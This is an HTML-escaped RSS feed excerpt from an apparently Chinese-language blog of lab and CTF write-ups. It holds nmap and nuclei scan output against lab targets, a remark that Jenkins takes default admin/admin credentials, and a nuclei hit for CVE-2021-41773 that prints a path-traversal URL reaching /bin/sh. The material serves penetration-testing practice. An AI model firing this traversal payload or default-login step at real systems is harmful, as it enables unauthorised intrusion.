&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;root@kali&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; /home/kali  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;❯ nmap 192.168.55.68 -sV -A -p-                                                                                                               
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Not shown: &lt;span class=&#34;m&#34;&gt;65523&lt;/span&gt; closed tcp ports &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;reset&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;PORT      STATE SERVICE       VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;80/tcp    open  http          Microsoft IIS httpd 10.0
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; http-methods: 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_  Potentially risky methods: TRACE
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-title: IIS Windows
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-server-header: Microsoft-IIS/10.0
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;135/tcp   open  msrpc         Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;445/tcp   open  microsoft-ds?
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;8080/tcp  open  http          Jetty 12.0.19
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-server-header: Jetty&lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;12.0.19&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-title: Site doesn&lt;span class=&#34;err&#34;&gt;&amp;#39;&lt;/span&gt;t have a title &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;text/html&lt;span class=&#34;p&#34;&gt;;&lt;/span&gt;&lt;span class=&#34;nv&#34;&gt;charset&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;=&lt;/span&gt;utf-8&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;.
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; http-robots.txt: &lt;span class=&#34;m&#34;&gt;1&lt;/span&gt; disallowed entry 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_/
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;49664/tcp open  msrpc         Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;49665/tcp open  msrpc         Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;49666/tcp open  msrpc         Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;49667/tcp open  msrpc         Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;49668/tcp open  msrpc         Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;49669/tcp open  msrpc         Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;49670/tcp open  msrpc         Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;MAC Address: 08:00:27:9C:A2:BB &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;PCS Systemtechnik/Oracle VirtualBox virtual NIC&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Device type: general purpose
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Running: Microsoft Windows &lt;span class=&#34;m&#34;&gt;10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;OS CPE: cpe:/o:microsoft:windows_10
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;OS details: Microsoft Windows &lt;span class=&#34;m&#34;&gt;10&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;1709&lt;/span&gt; - 21H2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Network Distance: &lt;span class=&#34;m&#34;&gt;1&lt;/span&gt; hop
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Service Info: OS: Windows&lt;span class=&#34;p&#34;&gt;;&lt;/span&gt; CPE: cpe:/o:microsoft:windows
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Host script results:
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_clock-skew: 14h59m58s
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; smb2-time: 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;   date: 2025-06-01T03:03:58
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_  start_date: N/A
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_nbstat: NetBIOS name: BUILD, NetBIOS user: &amp;lt;unknown&amp;gt;, NetBIOS MAC: 08:00:27:9c:a2:bb &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;PCS Systemtechnik/Oracle VirtualBox virtual NIC&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; smb2-security-mode: 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;   3:1:1: 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_    Message signing enabled but not required
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;jenkins-rce&#34;&gt;Jenkins RCE&lt;/h2&gt;
&lt;p&gt;来到&lt;code&gt;8080&lt;/code&gt;端口，默认的用户凭证就是&lt;code&gt;admin&lt;/code&gt;/&lt;code&gt;admin&lt;/code&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-LogisticCloud</title>
      <link>https://www.hyhforever.top/posts/2025/05/dockerlabs-logisticcloud/</link>
      <pubDate>Fri, 30 May 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/05/dockerlabs-logisticcloud/</guid>
      <description>靶机：LogisticCloud；扫描端口，利用MinIO存储爆破Excel密码获取用户登录，导出KeePass数据库爆破获得root权限。</description>
    </item>
    <item>
      <title>Dockerlabs-Thedog</title>
      <link>https://www.hyhforever.top/posts/2025/05/dockerlabs-thedog/</link>
      <pubDate>Fri, 30 May 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/05/dockerlabs-thedog/</guid>
      <description>&lt;h2 id=&#34;nmap&#34;&gt;NMAP&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-BASH&#34; data-lang=&#34;BASH&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;root@kali&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; /home/kali/thedog  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;❯ nmap 172.17.0.2 -sV -A -p-   
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;PORT   STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;80/tcp open  http    Apache httpd 2.4.49 &lt;span class=&#34;o&#34;&gt;((&lt;/span&gt;Unix&lt;span class=&#34;o&#34;&gt;))&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-title: Comando Ping
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; http-methods: 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_  Potentially risky methods: TRACE
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-server-header: Apache/2.4.49 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Unix&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;MAC Address: 02:42:AC:11:00:02 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Unknown&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Device type: general purpose&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;router
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Running: Linux 4.X&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;5.X, MikroTik RouterOS 7.X
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;OS details: Linux 4.15 - 5.19, OpenWrt 21.02 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Linux 5.4&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;, MikroTik RouterOS 7.2 - 7.5 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Linux 5.6.3&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Network Distance: &lt;span class=&#34;m&#34;&gt;1&lt;/span&gt; hop
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;nuclei&#34;&gt;Nuclei&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-shell&#34; data-lang=&#34;shell&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;root@kali&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; /home/kali/thedog  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;❯ nuclei -u http://172.17.0.2                                                                                                                 ⏎
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;                     __     _
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;   ____  __  _______/ /__  &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;_&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;  / __ &lt;span class=&#34;se&#34;&gt;\/&lt;/span&gt; / / / ___/ / _ &lt;span class=&#34;se&#34;&gt;\/&lt;/span&gt; /
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt; / / / / /_/ / /__/ /  __/ /
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;/_/ /_/&lt;span class=&#34;se&#34;&gt;\_&lt;/span&gt;_,_/&lt;span class=&#34;se&#34;&gt;\_&lt;/span&gt;__/_/&lt;span class=&#34;se&#34;&gt;\_&lt;/span&gt;__/_/   v3.4.2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;                projectdiscovery.io
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;INF&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Current nuclei version: v3.4.2 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;outdated&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;INF&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Current nuclei-templates version: v10.2.2 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;latest&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;WRN&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Scan results upload to cloud is disabled.
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;INF&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; New templates added in latest release: &lt;span class=&#34;m&#34;&gt;65&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;INF&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Templates loaded &lt;span class=&#34;k&#34;&gt;for&lt;/span&gt; current scan: &lt;span class=&#34;m&#34;&gt;7991&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;INF&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Executing &lt;span class=&#34;m&#34;&gt;7793&lt;/span&gt; signed templates from projectdiscovery/nuclei-templates
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;WRN&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Loading &lt;span class=&#34;m&#34;&gt;198&lt;/span&gt; unsigned templates &lt;span class=&#34;k&#34;&gt;for&lt;/span&gt; scan. Use with caution.
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;INF&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Targets loaded &lt;span class=&#34;k&#34;&gt;for&lt;/span&gt; current scan: &lt;span class=&#34;m&#34;&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;INF&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Templates clustered: &lt;span class=&#34;m&#34;&gt;1743&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Reduced &lt;span class=&#34;m&#34;&gt;1638&lt;/span&gt; Requests&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;INF&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Using Interactsh Server: oast.me
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;CVE-2021-41773:RCE&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;high&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; http://172.17.0.2/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http-trace:trace-request&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;info&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; http://172.17.0.2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http-trace:options-request&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;info&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; http://172.17.0.2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;missing-sri&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;info&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; http://172.17.0.2 &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;&lt;span class=&#34;s2&#34;&gt;&amp;#34;https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css&amp;#34;&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;waf-detect:apachegeneric&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;info&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; http://172.17.0.2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http-missing-security-headers:cross-origin-opener-policy&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;info&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; http://172.17.0.2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http-missing-security-headers:content-security-policy&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;info&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; http://172.17.0.2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http-missing-security-headers:x-permitted-cross-domain-policies&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;info&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; http://172.17.0.2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http-missing-security-headers:referrer-policy&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;info&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; http://172.17.0.2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http-missing-security-headers:cross-origin-resource-policy&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;info&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; http://172.17.0.2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http-missing-security-headers:strict-transport-security&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;info&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; http://172.17.0.2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http-missing-security-headers:permissions-policy&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;info&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; http://172.17.0.2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http-missing-security-headers:x-frame-options&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;info&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; http://172.17.0.2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http-missing-security-headers:x-content-type-options&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;info&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; http://172.17.0.2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http-missing-security-headers:clear-site-data&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;info&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; http://172.17.0.2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http-missing-security-headers:cross-origin-embedder-policy&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;info&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; http://172.17.0.2
